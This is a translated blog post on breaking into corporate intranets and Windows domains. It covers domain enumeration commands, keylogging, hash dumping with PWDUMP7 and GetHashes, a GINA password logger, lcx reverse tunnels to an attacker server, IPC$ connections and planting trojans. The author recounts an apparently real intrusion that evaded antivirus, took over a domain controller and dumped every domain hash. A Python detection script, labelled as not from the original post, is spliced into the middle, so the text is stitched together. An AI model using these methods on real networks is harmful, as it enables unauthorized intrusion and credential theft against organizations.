Summary of General Intranet penetration ideas

Source: Internet
Author: User
Tags: net command

Relatively speaking, there is little material on the Internet about intranet penetration, and few people write up detailed notes for their peers to refer to. Today I will only give a general introduction to some intranet knowledge.

First, under what circumstances will we encounter an intranet? If your target is only a small website, you do not need to consider the intranet at all. But if your target is a large website or a company, you must consider it.

During a penetration, many of a large network's external websites or servers are not necessarily useful. Of course, the Internet-facing side can also serve as the breakthrough point; after all, until we try it we do not know the structure behind it, and at least we can obtain some external information.

The information may be the same either way, but for the intranet, the Internet-facing side is definitely not our main path. In many cases it is increasingly difficult to reach the intranet directly from the Internet.

So what should we do about the intranet? What is available, and what methods are there? Let us discuss it together.

Penetration is information collection, classified archiving, and technical use to achieve the goal.

When we get an intranet machine, the first thing to do is collect information. What information? A lot...

1. Information Collection

1-1. However the intranet machine was obtained, once we have determined that it is on an internal network, we should first understand who uses this machine. If our target is the company, we need to know this person's position in the company, his identity, his rights, and his permissions on the intranet. In a large company, someone with high permissions needs to use many things on the internal network, so his permissions will be far higher than an ordinary employee's; I see this often in my own penetration work.

Now that we have his machine, we have to go through his computer. As for how: try to become as familiar with his computer as he is, or even more so, and you will learn much more. From a personal computer, getting some information about the person himself and a large amount of company information should be no problem, unless it is a new computer.

1-2. Having learned a certain amount about the personnel, write down the important data you have gathered, such as accounts and passwords; you will be using them for a while. So before you start penetrating, you may as well create a notebook to save important information. Keeping a notebook does not waste much time.

Next, we should have some understanding of this network. Is it an ordinary intranet or a domain? Large companies generally use a domain; we only need to check. To penetrate it we must understand its network topology. Of course we cannot learn the physical details; we can only learn what we are able to. Whether it is INT, DMZ, or LAN, we have to be familiar with it. Here we use some commands that everyone should already be familiar with.

ipconfig /all shows the local machine's situation: IP segment, gateway, and whether it belongs to a domain.

net view lists some associated machines, usually by machine name. We need to ping these machines for their IP addresses, partly to find the IP addresses of important machines and partly to find out how many segments there are.

net view /domain lists the domains; a large network generally has more than one.

net group /domain lists the groups in the domain.

net user /domain lists the domain users.

net group "domain admins" /domain lists the domain administrators group.

These are all things we need to know. Sometimes we need to query more; you will find the rest under the net command, and I will not repeat them here. Analyze each situation as it comes.

2. Information Archiving

2-1. Once information is available, we need to archive it to some degree, recording the IP corresponding to each machine name so that things do not get messy when we use them.

2-2. The users and administrators found by the queries must be archived.

2-3. Any valuable information that turns up during the queries must be archived.

3. Technical Utilization

3-1. Whether by keylogging or by hash capture, we need to save all the key data: accounts, passwords and e-mail addresses. On the one hand this prepares information for the penetration; on the other hand it keeps the data if the current foothold is lost.

3-1-1. Use the keylogging function of the remote control tool to capture them.

3-1-2. Use PWDUMP7 or GetHashes to capture the hashes and crack them. GetHashes v1.4 and later can capture all the hash values of the domain.

3-1-3. Use GinaStub.dll to obtain the administrator account and password. Because the domain administrator has permission to log on to any machine, the password is easy to record. After installation, a faxmode.inc file is generated under system32 that records the password.

3-2. Once on the intranet, we do not need to run many things directly on the current machine. Although it is on the intranet, that does not mean there is no defense system, so it is necessary to set up SOCKS or a VPN; I believe everyone can do this.

3-2-1. I recommend VIDC, which is very convenient. Run it directly from cmd:

vidc.exe -d -p port

3-2-2. Use LCX. On the controlled machine, from cmd:

lcx.exe -slave server_ip port 127.0.0.1 port

Then on the server, from cmd:

lcx.exe -listen port arbitrary_port

3-2-3. After SOCKS is set up, you can connect locally with SocksCap. After the connection succeeds, you can operate as if you were on your own machine.

Basically that is all we can do; there is no further technical reuse or exploitation beyond this. However, there is a lot of experience to be gained in this process, and a lot of details to deal with.

What if the intranet machine we get is in a domain but does not use a domain account? Then we can only query, or do everything we can to get his usual account password, then use that account and password to enter the domain through SOCKS. In this case you have to look through and control the machine's files, record passwords, use GINA, and crack hashes.

What should we do after entering the domain, once SOCKS is in place? We can use the S scanner to check the main ports. We can try weak passwords on those ports. We can probe intranet web applications in many ways; you can even use MS08-067 to break into another machine, but believe me, most machines that are in a domain are patched. There is very little we can use, but we cannot be discouraged. As long as we can move around the intranet, we will at least have a much easier time with the defenses. What we need is patience and time.

Once we have a password, we can try an IPC$ connection and take the domain directly. It depends on how much permission you have.

net use \\IP\ipc$ password /user:username@domain

We recommend entering the account and password in this form. Why? If the user name contains a space, typing it this way is safer. You may ask: can a domain user name even contain spaces?

Yes. I used to think it could not, and Microsoft's instructors said it could not either. But after my own tests and experience, that is false: a domain user name can contain spaces and still works. If you do not believe it, try it. After the IPC$ connection is created, whether you copy files, rar them, or plant a trojan is your own business.
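As an added example (not from the original post), the following Python script shows how a defender could spot the chain this post describes in process-creation telemetry: the net.exe domain enumeration commands from section 1, the net use \\IP\ipc$ connection above, and the at.exe remote job mentioned in the afterword. The sample records, their four-field layout, the rule weights and the alert threshold are all constructed assumptions for this example.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records: (host, epoch seconds, user, command line).
# Not real telemetry; the four-field layout is an assumption made for this example.
SAMPLE_EVENTS = [
    ("WS-042", 1000, "jdoe", "ipconfig /all"),
    ("WS-042", 1010, "jdoe", "net view /domain"),
    ("WS-042", 1020, "jdoe", 'net group "domain admins" /domain'),
    ("WS-042", 1030, "jdoe", "net user /domain"),
    ("WS-042", 1200, "jdoe", r"net use \\10.0.0.5\ipc$ Passw0rd /user:corp\admin"),
    ("WS-042", 1260, "jdoe", r"at \\10.0.0.5 23:00 c:\windows\system32\svc.exe"),
    ("WS-017", 2000, "asmith", "net view"),
    ("WS-017", 9000, "asmith", "net user /domain"),
]

# One rule per step of the chain the post walks through; the weights are an assumption.
RULES = [
    ("domain_enum", re.compile(r"^net\s+(view|group|user)\b.*\s/domain\b", re.I), 1),
    ("domain_admins_query", re.compile(r'^net\s+group\s+"domain admins"', re.I), 2),
    ("ipc_connect", re.compile(r"^net\s+use\s+\\\\\S+\\ipc\$", re.I), 3),
    ("at_remote_job", re.compile(r"^at\s+\\\\\S+", re.I), 3),
]
WEIGHTS = {name: weight for name, _, weight in RULES}

def classify(cmdline):
    """Return the names of every rule the command line matches (may be several)."""
    return [name for name, rx, _ in RULES if rx.search(cmdline.strip())]

def score_hosts(events, window=600, threshold=4):
    """Sum rule weights per host over a sliding window; return {host: (best score, rule names)}."""
    hits = defaultdict(list)
    for host, ts, _user, cmd in events:
        for name in classify(cmd):
            hits[host].append((ts, name))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):
            names = [n for t, n in seq[i:] if t - start <= window]
            score = sum(WEIGHTS[n] for n in names)
            if score >= threshold and score > alerts.get(host, (0, []))[0]:
                alerts[host] = (score, names)
    return alerts

if __name__ == "__main__":
    for host, (score, names) in score_hosts(SAMPLE_EVENTS).items():
        print(host, score, names)  # prints WS-042 11 [...]; WS-017 stays below threshold
```

A single "net user /domain" is routine admin activity, which is why the script scores the whole sequence within a time window rather than alerting on one command.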

Afterwards: recently, in a domain penetration, several problems occurred during the process, and several times I did not know how to proceed. In fact there was no technical obstacle; the main reason was that the other side had strong front-line defenses, and at first my remote control tool could not execute cmd. After several days of testing the environment, I broke through to cmd. With cmd I ran queries, obtained some information, and then began to penetrate further. I did not crack the controlled machine's password; I went through his files and pulled out his usual password. Because he does not use a domain account and logs in with a local system account, he cannot view the domain. I could only use his domain account to establish an IPC$ connection, find a web service on the intranet, and penetrate it to win a stable intranet machine.

After I took the intranet web server, I was fully inside the domain without using hash injection. I first queried DOMAIN ADMINS and found that the account on the web server belonged to this group; I then ran PW to get the hashes, and I even got onto the domain controller's IPC$.

With IPC$ connected, I dropped a remote control tool directly under its system32 and then started it with the AT command. I had tried the five-times-Shift trick during this period, but once Shift is disabled my remote control would fall too, so once that method is ruled out it is more convenient to use AT to add a new job.

With remote control on the domain controller, I used cmd and GetHashes to dump all the hashes for cracking. Fortunately the users in the file management group were found, and the goal behind all this was achieved.

Overall, this penetration had good luck and there were not too many troubles along the way. Still, it took me half a month, most of it spent testing the defensive environment, dealing with antivirus, making tools undetectable, and searching for information.

Later I obtained his network topology diagram and found that the area I had stayed in was just one small domain; there were several other domains I never touched. In front of the domain was the DMZ, and in front of the DMZ, of course, was INT.

It is very late. I had been writing a detailed penetration process, but because I have been working on this for a long time I could not record many details on the spot. So for now I will write what I can think of on the blog; if the environment is available later, I will add more details, along with images, the troubles encountered during penetration, and how they were solved.
